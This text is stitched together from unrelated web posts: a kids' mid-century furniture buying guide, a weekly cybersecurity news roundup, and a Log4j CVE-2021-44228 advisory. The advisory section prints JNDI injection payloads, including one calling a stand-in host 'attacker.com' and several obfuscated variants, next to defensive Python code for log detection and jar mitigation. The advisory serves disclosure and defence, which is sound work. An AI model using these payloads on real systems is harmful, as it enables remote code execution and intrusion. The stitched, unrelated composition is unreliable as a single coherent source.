Another great piece that we suggest for your kid’s room is the KidKraft Mid-Century Kid Upholstered Reading Chair and Ottoman with Storage. This kids’ reading chair features a vintage mid-century classic style, and it will quickly bring some class to your kids’ room decor. It is also very comfortable, which means that your child will be able to relax and read in style.

The chair also comes with an ottoman, which can be used as a storage unit. This is a great feature, as it will help you keep the room neat and organized. The ottoman is also very comfortable, and it will be perfect for your child to relax on.

The KidKraft Mid-Century Kid Upholstered Reading Chair and Ottoman with Storage is made of wood, making it both strong and durable. The chair is upholstered in a soft fabric, which will make it very comfortable for your child.

DIAOD Mid-Century Modern Footstool

This adorable little footstool is perfect for any kids’ room. It features a mid-century modern design, easily matching most room decor styles. It is also very comfortable, which means that your child will love to use it while playing or watching TV.

This footstool is made of plywood and fabric, so it is both lightweight and sturdy. It is effortless to move around, but it won’t be easily tipped over. The DIAOD Mid-Century Modern Footstool comes in a variety of stylish colors, so you will surely find one that matches your child’s room decor.

Christopher Knight Home Evelyn Mid Century Modern Fabric Arm Chair

With its beautiful vintage design, this armchair is a must-have for fans of the classic style. This comfy choice boasts four sturdy walnut legs, adding to the appeal of this elegant chair. The easy-to-clean fabric is perfect for busy households, and the high-density foam provides hours of relaxation.

The Evelyn Mid Century Modern Fabric Arm Chair would look great in any room and would make a perfect place for your child to relax with a good book or watch TV. The chair is also very comfortable, so your child will be able to enjoy it for hours on end.

KidKraft Mid-Century Kid Wooden Corner Reading Nook

This KidKraft Mid-Century Kid Wooden Corner Reading Nook is perfect for any kid who loves to read. It features an adorable design with adjustable shelves, making it easy to customize the nook according to your child’s needs.

Your child will love spending their time in this corner reading nook! The high back and soft cushions will make it a very comfortable place to relax. The nook is also very spacious, so your child will have plenty of room to spread out.

The product is very versatile, as it would work perfectly in any bedroom. It will help to keep your child’s room organized and neat.

AOKAEII High Back Rocker Chair & Ottoman

A staple piece in a nursery! This chair is perfect for mothers and fathers to read to their children, nurse them or just spend some quality time together. The AOKAEII High Back Rocker Chair & Ottoman is a stylish and comfortable choice that easily complements any nursery decor.

The sturdy solid rubberwood base construction gives stability when rocking. When you sit down, you feel as if you’re lying down naturally. The glider rocker has a footrest, which adds to the chair’s stability. This chair can bear up to 300 pounds.

The AOKAEII High Back Rocker Chair & Ottoman is made of high-quality materials: the 40-density high-elastic foam is thicker and more resilient than other foams. It is upholstered in soft, high-quality linen fabric that is both delicate and robust, with a cushiony, wear-resistant feel that is skin-friendly and easy to maintain.

Kids’ activity tables and desks in mid-century modern style

If your kid loves to draw, color, and do other types of arts & crafts activities, a kids’ activity table is an essential piece of furniture. A good activity table should be very sturdy and durable so that it can withstand hours of use.

Milliard Kids Mid Century Modern Table and Chair Set Wooden with Storage Baskets

This great kids’ activity table is a fantastic choice for home and school use. It boasts two large storage baskets, which will help to keep your child’s room neat and organized at all times.

This table and chair set is ideal for coloring, tea parties, car races, and so much more because it is the perfect size for young ones. The set has a white and brown mid-century modern design that suits any room in the house.

The sturdy construction of this activity table, which is made of pine and MDF, makes it ideal for children to use. The table and chairs have been independently tested for strength and safety by a consumer organization.

Wildkin Kids Modern Study Desk with Storage and Stool

With Wildkin’s children’s desk and chair set, cater to your child’s creative side! This kids’ table and chair set is sized just right for small children looking for somewhere to let their imaginations run wild. This sturdy and sleek design makes this a great addition to bedrooms, playrooms, or living rooms.

Wildkin’s table and chairs for little ones include a storage area beneath for the child’s books, pencils, and other supplies. The desk table’s stain-resistant melamine top and tough natural wood legs guarantee that Wildkin’s desk for kids with storage and desk stool set will withstand any little artist. This desk and stool’s classic, timeless solid wood legs are both durable and safe for the kids.

Mid-century modern storage solutions for kids

Finally, we suggest that you don’t forget about toys and storage solutions. For example, an elegant wooden toy box with a sleek design would be a great option. This way, you can keep all of your precious items organized while providing an attractive storage unit for your children’s toys at the same time.

KidKraft Mid-Century Kid Bin Storage Unit

Storage units in mid-century modern style are surprisingly challenging to find. That’s why we were so happy to discover this stylish bin storage unit by KidKraft. It can be used in any part of the house, but it is ideal for bedrooms and playrooms.

The KidKraft Mid-Century Kid Bin Storage Unit features sturdy wood construction and a beautiful white and grey finish. It has two large bins that are perfect for storing toys, clothes, books, and other items. The bins are also removable so that they can be easily cleaned. The top of the unit has two open compartments, ideal for toys you want to keep within easy reach.

The popular mid-century modern design style is represented by the clean lines, rounded feet, and geometric pattern on the back wall. Get the toy organization you need and the style you crave with this KidKraft storage unit.

The origins of Mid-Century Modern

Mid-century modern design was born out of the cultural zeitgeist after World War II. According to James A. Bier, Ph.D., Curator at the Smithsonian’s National Museum of American History, Americans were “reflecting on what they had done…through the creation of this weapon.” As a result, many designers began to focus on new ways to improve daily life and make it more comfortable.

One of the most iconic aspects of mid-century modern design is its organic shapes and natural materials. This was a reaction against the stark, angular lines of Art Deco and the over-the-top luxury of the previous era. Mid-century designers favored simple forms and minimal ornamentation, resulting in sleek furniture that was as comfortable as it was stylish.

Mid-century modern also focused on creating designs with a sense of lightness and balance, no matter how outlandish the shapes became. According to Bier, this style “is really about removing barriers between people and objects.” Many homeowners found they could combine pieces from different manufacturers and still have a cohesive look.

Mid-century modern was not just a design style but an entire way of life. It embraced both the city and the country, emphasizing simple living with access to modern conveniences like dishwashers, TVs, and garage doors. This generation popularized vibrant colors because they wanted to bring happiness and brightness into their homes.

If you’re looking to add a touch of mid-century modern to your home, start by incorporating natural materials like wood, metal, and glass. Keep the lines simple and avoid excessive ornamentation. Colors should be light and bright, emphasizing cool neutrals and pastels. And finally, keep an eye out for furniture pieces that are sleek, streamlined, and comfortable.

Mid-century modern designs also had a certain uniformity because of the post-war conviction that, as George Nelson put it in 1976, “good design was democratic.” Although there was never a clearly defined set of standards for mid-century modern homes, most houses built during this era shared similar characteristics, such as large expanses of glass, open floor plans, and a connection to the outdoors.

As we move further into the 21st century, mid-century modern design is becoming more popular than ever. If you’re looking for a way to add some timeless style to your home, look no further than mid-century modern.

Is Mid-Century Modern still in style?

Yes! Mid-century modern design is more popular than ever and shows no signs of slowing down. Mid-century modern is timeless and elegant, making it an excellent choice for those who want their home to be stylish as well as functional.

Mid-century furniture designs are a massive inspiration for interior designers because of the wide range of pieces available and the simplicity of their lines. Mid-century modular sofas allow many homeowners to create their dream living room with the perfect seating arrangement.

Mid-century modern also offers homeowners a wide range of design possibilities, from sleek and simple to bold and dynamic. There’s no “one size fits all” approach to mid-century decor.

Is Mid-Century Modern furniture expensive?

No! Although some mid-century modern pieces are rare or one-of-a-kind antiques, many affordable reproductions can be found in furniture stores and online. You don’t have to spend a fortune to add some mid-century style to your home.

What are the Advantages and Disadvantages of Mid-Century Modern Design?

Mid-century modern has many advantages that continue to make it popular today. First of all, the clean, modern lines are easy to maintain, making it a great choice for homeowners who want stylish furniture but don’t require much upkeep. Mid-century modern also has a classic feel to it, which never goes out of style.

Mid-century design is focused on creating sleek and functional furniture while being comfortable at the same time. This means that many of the pieces are versatile and can be used in various settings.

However, one disadvantage of mid-century modern design is that it can be difficult to find unique pieces. Since the style is so popular, many iconic designs have been reproduced multiple times. So, if you’re looking for something truly one-of-a-kind, you may have to search harder (and for a much higher price).

The post Mid-Century Modern Furniture For Kids’ Room appeared first on Comfy Bummy.

The Good, the Bad and the Ugly in Cybersecurity – Week 50

The Good

This week we have another law enforcement victory to highlight. The indictment of Matthew Philbert (charges were filed in both the United States and Canada) was the result of “Project CODA”, a joint operation between Europol, the FBI, and Canada’s Ontario Provincial Police (O.P.P.). Project CODA began in early 2020 after the FBI contacted Canadian law enforcement for help with an investigation into various ransomware attacks on U.S. businesses originating in Canada.

Philbert, described as one of Canada’s “most prolific cybercriminals”, was formally charged with numerous counts of fraud and cybercrime, including ransomware attacks and botnet operation. The indictment covers multiple counts from 2018, though he is allegedly tied to a host of other attacks dating back many years. Authorities also seized a plethora of laptops, phones, drives, carding blanks, and cryptocurrency wallet metadata that helps tie Philbert to the crimes.

Philbert was one of the original Darkode forum members back in 2009 and was active on many other established underground forums and markets. He has also been tied to the operation of at least one Mariposa-based botnet. Perhaps the most eye-opening aspect of the charges is the clear indication that Philbert was attacking medical facilities during the period covered by the indictment.

“On or about April 28, 2018, within the District of Alaska and elsewhere, the defendant, MATTHEW PHILBERT, knowingly caused and attempted to cause the transmission of a program, information, code, and command, and, as a result of such conduct, intentionally caused and attempted to cause damage without authorization to a protected computer owned by the State of Alaska, and the offense caused and would, if completed, have caused: (a) the modification, impairment, and potential modification and impairment of the medical examination, diagnosis, treatment and care of 1 or more individuals; (b) a threat to public health and safety; and, (c) damage affecting 10 or more protected computers during a 1-year period.”

While the events in question predate the current global situation, any attack on a medical entity is reprehensible, so we have one more victory for global law enforcement to cheer and one more prolific criminal taken off the grid. Hooray!

The Bad

This was a rough week for the retail industry with regard to ransomware attacks. North of 300 outlets of the SPAR supermarket chain were affected by an apparent ransomware incident. As a result of the attack, many locations were forced to close, while others had to resort to processing transactions on paper.

A SPAR spokesperson stated that the attack was:

“impacting stores’ ability to process card payments meaning that a number of SPAR stores are currently closed to shoppers or are taking only cash payments.”

At the time of writing, there is no clear indication of the ransomware family involved, nor is there any detail on the payment status of the ransom.

A similar scenario played out at the Delta-Montrose Electric Association (DMEA). The member-owned electric cooperative in Colorado has also revealed it was the subject of a breach involving “file-encrypting malware”. At the time, the attack left nearly 90% of its internal systems down or impaired. As with the SPAR incident, there is currently no confirmed information on which ransomware family was involved.

Both victims are on the road to recovery, but these attacks serve as a reminder of the importance of prevention when it comes to ransomware.

The Ugly

Life in Russia became much more difficult for Tor users this week. On December 1, Russia’s Roskomnadzor (the Federal Service for Supervision of Communications, Information Technology, and Mass Media) started blocking traffic to Tor relays. That was followed this week by a block on access to Tor’s main site.

Attempting to explain the reasons for the action, a spokesperson for Roskomnadzor said:

“The grounds were the spreading of information on the site ensuring the work of services that provide access to illegal content…Today, access to the resource has been restricted.”

The country’s crackdown on Tor is just the latest in a wave of censorship over the last few months that has seen Apple forced to turn off its Private Relay service, Opera remove its browser’s VPN, and ten other VPNs blocked. In response to the latest action, the Tor team has created a website mirror that remains reachable from inside Russia.

Meanwhile, a capable and persistent threat actor has been running thousands of Tor relays for at least four years in what looks like a systematic Sybil attack. By operating a large share of the network’s relays, the actor raises the odds that the same operator sits at both the entry and exit of a user’s circuit, which is what is needed to deanonymize that traffic or to collect enough information on users to map their routes through the network.

It is estimated that, at one point, as much as 10% of the Tor network could have been under the control of a single entity. All the identified relays have been removed, but researchers believe the effort is ongoing and are actively hunting for more suspicious relays.

CVE-2021-44228: Staying Secure – Apache Log4j Vulnerability

Executive Summary

  • A new critical remote code execution vulnerability in Apache Log4j2, a Java-based logging tool, is being tracked as CVE-2021-44228.
  • Exploit proof-of-concept code is widely available and internet wide scanning suggests active exploitation.
  • At the time of writing, exploit attempts lead to commodity cryptominer payloads. SentinelOne expects further opportunistic abuse by a wide variety of attackers, including ransomware and nation-state actors.
  • Major services and applications globally are impacted by the vulnerability due to the prevalence of Log4j2’s use in many web apps.
  • Due to the ease and rate of exploitation attempts, SentinelOne recommends upgrading impacted services to the latest version of Log4j2.

Background

On December 9th, 2021, the security community became aware of active exploitation attempts of a vulnerability in Apache Log4j 2. The vulnerability is trivially easy to exploit: an attacker only needs to get a string of the form `${jndi:ldap://attacker.com/file}` into any value the application logs, such as a User-Agent header or a username field, and Log4j 2’s message lookup feature resolves it as a Java Naming and Directory Interface (JNDI) request (further variations are documented below). It is difficult to assess the extent of possible impact because Log4j 2 is used across a wide range of products and services, from Apache projects like Struts, Solr, and Flink to widely deployed data infrastructure like Elasticsearch, Logstash, and Kafka, and even Minecraft servers. Defenders are encouraged to update any explicit uses of Log4j 2 to version 2.15.0-rc2 or higher, and to scrutinize other services that may depend on it transitively through bundled libraries.

As described in the NVD vulnerability disclosure, the JNDI features used by Log4j 2’s lookups do not restrict where a request may be sent, so an attacker can point them at an endpoint they control over LDAP(S), DNS, or RMI. The vulnerable service contacts that endpoint, which can answer with a reference to a remote Java class or a serialized object; the JVM then loads and executes that code in the context of the process that called Log4j 2. DNS variants are also used purely for reconnaissance, since the lookup itself leaks whatever the attacker embeds in the queried hostname, such as environment variables.

Examples:

${jndi:ldap:///}  

${jndi:dns:///} 

${jndi:ldap://${env:}./}

Further variants of the malicious request have been publicly reported and include slight obfuscation with nested functions like ${lower:} as follows:

${jndi:${lower:l}${lower:d}ap:///}
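Because the obfuscated variants above only resolve to `${jndi:` after Log4j evaluates the nested lookups, a detection rule that greps for the literal string misses them. The following is an added example, not code from the original advisory or from the Log4j project: it resolves the `${lower:}`, `${upper:}` and default-value (`${key:-x}`, which also covers `${::-x}` and `${env:UNSET:-x}`) forms the way Log4j would, URL-decodes first, and then matches on the normalized text. The set of resolved lookups and the SAMPLE_LOG access-log lines are constructed assumptions for the example.

```python
"""Normalize Log4j 2 lookup strings and flag JNDI injection attempts in log lines.

Added example, not code from the original advisory or the Log4j project.
Resolution rules implemented here (an assumption about what attackers nest):
${lower:x}, ${upper:x}, and the default-value form ${key:-x}, which covers
${::-x} and ${env:UNSET:-x}. Other lookups (jndi:, env:, date:, ...) are left
in place so the final ${jndi: keyword still matches. SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import unquote

JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _match_brace(s: str, open_idx: int) -> int:
    """open_idx points at '{'; return the index of its matching '}' or -1."""
    depth = 0
    for j in range(open_idx, len(s)):
        if s[j] == "{":
            depth += 1
        elif s[j] == "}":
            depth -= 1
            if depth == 0:
                return j
    return -1


def _resolve(body: str) -> str:
    """Resolve one lookup body (text between '${' and '}') whose nested
    lookups have already been resolved."""
    if ":-" in body:                      # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep and kind.strip().lower() == "lower":
        return arg.lower()
    if sep and kind.strip().lower() == "upper":
        return arg.upper()
    return "${" + body + "}"              # unknown lookup: keep it literally


def normalize(s: str) -> str:
    """Resolve nested lower/upper/default lookups from the inside out."""
    out, i = [], 0
    while i < len(s):
        if s.startswith("${", i):
            end = _match_brace(s, i + 1)
            if end == -1:                 # unbalanced braces: keep tail as-is
                out.append(s[i:])
                break
            out.append(_resolve(normalize(s[i + 2:end])))
            i = end + 1
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def is_jndi_injection(raw: str) -> bool:
    """True if the line contains a ${jndi: lookup after URL-decoding and
    lookup normalization."""
    return bool(JNDI.search(normalize(unquote(raw))))


def scan(lines):
    """Return (line_number, normalized_line) for each suspicious line."""
    return [(n, normalize(unquote(line)))
            for n, line in enumerate(lines, 1)
            if is_jndi_injection(line)]


# Constructed access-log lines using RFC 5737 addresses, not captured traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.8 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${jndi:${lower:l}${lower:d}ap://198.51.100.9/a}"',
    '203.0.113.10 - - "GET / HTTP/1.1" 200 '
    '"${${::-j}${::-n}${::-d}${::-i}:${env:NOPE:-r}mi://198.51.100.9/a}"',
    '203.0.113.11 - - "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 400 "-"',
    '203.0.113.12 - - "GET / HTTP/1.1" 200 "${date:yyyy} plain lookup, not jndi"',
]

if __name__ == "__main__":
    for n, norm in scan(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

The normalizer deliberately keeps unknown lookups such as `${date:}` or `${env:}` in place rather than dropping them, so a benign lookup in a log line is not flagged while a `${jndi:...}` wrapping one still is. Run it against real access logs by passing the file’s lines to scan(); expect false negatives for encodings not modeled here (e.g. double URL-encoding), which is why this is a triage aid and not a substitute for the upgrade.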

At the time of writing, payloads include cryptominers like Golang-based Kinsing ELF payloads but there’s nothing limiting the potential for abuse as attackers ramp up their infrastructure and tooling to take advantage of this exploitation opportunity.

SentinelOne is actively monitoring the situation and collaborating with industry partners to improve the collective defense of all internet users.

Mitigation Guidance

  • Upgrade Log4j 2 to the latest version, specifically log4j-2.15.0-rc2 or newer. (2.15.0 was the current fix at the time of writing; the project has since shipped further releases, so check Apache’s Log4j security page for the version to deploy rather than pinning to this one.)
  • According to Apache’s guidance, in releases >= 2.10 this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. Removing the class also works on newer releases and does not depend on every JVM being launched with the right flag, and Apache has since documented that the formatMsgNoLookups setting is insufficient in some non-default configurations, so prefer the upgrade and fall back to class removal where that is not yet possible.
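The mitigation choice above hinges on two facts about each jar on a host: its Log4j version and whether JndiLookup.class is still inside it. The following is an added example, not code from the advisory or from the Log4j project, that reads both from a log4j-core jar (the manifest’s Implementation-Version, falling back to the filename), maps them to the guidance listed above, and rewrites the jar without the class, which is the same effect as the zip -q -d command. The build_sample_jar() helper produces a constructed stand-in jar with an empty placeholder class entry so the example runs offline; real log4j-core jars carry the same entry path and manifest attribute, so inspect_jar() and strip_jndi_lookup() apply to them unchanged.

```python
"""Inspect a log4j-core jar and apply the classpath mitigation from Apache's guidance.

Added example, not code from the original advisory or the Log4j project.
build_sample_jar() produces a constructed stand-in (empty placeholder class
entries plus a manifest), not a real Log4j build.
"""
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"


def parse_version(text: str):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if no version found."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return tuple(int(g) if g else 0 for g in m.groups())


def read_version(jar: zipfile.ZipFile):
    """Implementation-Version from the manifest, falling back to the filename."""
    if MANIFEST in jar.namelist():
        for line in jar.read(MANIFEST).decode("utf-8", "replace").splitlines():
            if line.startswith("Implementation-Version:"):
                return parse_version(line.split(":", 1)[1])
    return parse_version(os.path.basename(jar.filename or ""))


def recommended_mitigation(version, has_jndi_lookup: bool) -> str:
    """Map (version, class present?) onto the advisory's guidance:
    2.15.0+ fixed; >= 2.10 may use the flag; older releases strip the class."""
    if version is None:
        return "unknown version: inspect manually"
    if version >= (2, 15, 0):
        return "not affected by CVE-2021-44228"
    if not has_jndi_lookup:
        return "JndiLookup.class already removed"
    if version >= (2, 10, 0):
        return "upgrade; interim: set log4j2.formatMsgNoLookups=true or remove JndiLookup.class"
    return "upgrade; interim: remove JndiLookup.class from the jar"


def inspect_jar(path: str) -> dict:
    """Report version, presence of JndiLookup.class, and the applicable mitigation."""
    with zipfile.ZipFile(path) as jar:
        version = read_version(jar)
        has_jndi = JNDI_CLASS in jar.namelist()
    return {"path": path, "version": version, "jndi_lookup": has_jndi,
            "mitigation": recommended_mitigation(version, has_jndi)}


def strip_jndi_lookup(src: str, dst: str) -> bool:
    """Copy src to dst without JndiLookup.class (same effect as
    `zip -q -d log4j-core-*.jar .../JndiLookup.class`). True if it was removed."""
    removed = False
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zout:
        for info in zin.infolist():
            if info.filename == JNDI_CLASS:
                removed = True
                continue
            zout.writestr(info, zin.read(info.filename))
    return removed


def build_sample_jar(directory: str, version: str) -> str:
    """Constructed stand-in for log4j-core-<version>.jar; class entries are empty."""
    path = os.path.join(directory, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(MANIFEST, f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        jar.writestr(JNDI_CLASS, b"")   # placeholder bytes, not real bytecode
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"")
    return path


def demo():
    """Build a vulnerable sample jar, inspect it, strip the class, re-inspect."""
    tmp = tempfile.mkdtemp()
    src = build_sample_jar(tmp, "2.14.1")
    before = inspect_jar(src)
    dst = os.path.join(tmp, "log4j-core-2.14.1-patched.jar")
    strip_jndi_lookup(src, dst)
    after = inspect_jar(dst)
    return before, after


if __name__ == "__main__":
    for report in demo():
        print(report)
```

Point inspect_jar() at every log4j-core jar found by a filesystem search (and at jars nested inside WAR or fat-jar archives, which this example does not unpack) to produce an inventory before deciding per host whether the upgrade, the flag, or class removal applies. Stripping the class disables all JNDI lookups, so anything legitimately using a `${jndi:}` lookup in its logging configuration will break; that is the intended trade-off.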

Additional Resources